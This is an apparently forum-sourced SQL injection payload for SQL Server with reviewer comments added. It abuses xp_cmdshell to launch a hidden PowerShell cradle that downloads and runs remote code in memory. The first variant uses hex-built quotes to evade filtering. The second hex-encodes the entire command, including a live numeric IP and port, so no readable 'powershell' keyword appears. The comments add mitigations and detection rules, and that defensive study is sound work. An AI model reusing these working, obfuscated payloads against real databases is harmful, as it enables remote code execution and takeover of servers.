-- Review note: this is T-SQL, not Bash as the forum label says. It is a SQL
-- injection payload that turns SQL Server's xp_cmdshell into OS command
-- execution by way of a PowerShell download-and-execute ("cradle") command.
-- Preconditions not shown on the page: the login the query runs under must
-- be allowed to call xp_cmdshell, which is disabled by default and needs
-- sysadmin to enable via sp_configure.
-- Mitigation: keep xp_cmdshell disabled, run the application under a
-- least-privilege login, and parameterize the statement being injected into;
-- escaping or filtering quote characters alone does not stop this (see 0x27).
-- Detection: audit xp_cmdshell invocations (SQL Audit / Extended Events) and
-- alert on powershell.exe whose parent process is sqlservr.exe
-- (e.g. Sysmon Event ID 1 process creation with parent image).
[Bash shell] 纯文本查看 复制代码 declare @a nvarchar(100)='powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(';
-- @a is the first half of the OS command: -nop (no profile), -w hidden (no
-- window), -c (inline command). IEX is Invoke-Expression, so whatever text
-- downloadstring fetches is executed in memory; this step writes nothing to disk.
declare @b nvarchar(100)='http://xxx.xxx.xxx.xxx:2000/a';
-- @b is the staging URL; the host is a placeholder on this page.
-- 0x27 is the hex literal for a single quote. Building the quotes from hex
-- keeps the ' character out of the injected text, which is why quote-based
-- filtering or escaping in the vulnerable parameter would not catch it.
declare @ab nvarchar(200)=concat(@a,0x27,@b,0x27,'))"');
-- xp_cmdshell hands the assembled string to the OS shell under the SQL Server
-- service account. The trailing -- is a T-SQL line comment; it presumably
-- discards whatever followed the injection point in the original query.
exec master..xp_cmdshell @ab;--
另一种:
-- Review note: same cradle as above, but the whole PowerShell command line is
-- carried as a single varbinary hex literal (0x70 6f 77 65 72 ... decodes to
-- "powershell.exe -nop -w hidden -c ..."), so the injected text contains no
-- quotes and no readable "powershell" keyword; concat() with 0x20 (a space)
-- coerces the bytes to a string before assignment to @a. Decoding the hex
-- yields the same powershell.exe/IEX/downloadstring command with a literal
-- numeric host and port in place of the xxx placeholder used above.
-- Only xp_cmdshell itself is still in cleartext here.
-- Detection: pattern-matching the query text for "powershell" misses this
-- variant; alert at the execution point instead (xp_cmdshell audit events,
-- process creation with parent sqlservr.exe) and flag long hex literals fed
-- to concat() in captured queries as a review trigger.
[Bash shell] 纯文本查看 复制代码 declare @a nvarchar(300) = concat(0x706f7765727368656c6c2e657865202d6e6f70202d772068696464656e202d6320224945582028286e65772d6f626a656374206e65742e776562636c69656e74292e646f776e6c6f6164737472696e672827687474703a2f2f3231312e3134392e3235352e3139363a323030302f6127292922,0x20);
-- As in the first variant: executes under the service account; trailing --
-- comments out the rest of the host query.
exec master..xp_cmdshell @a;--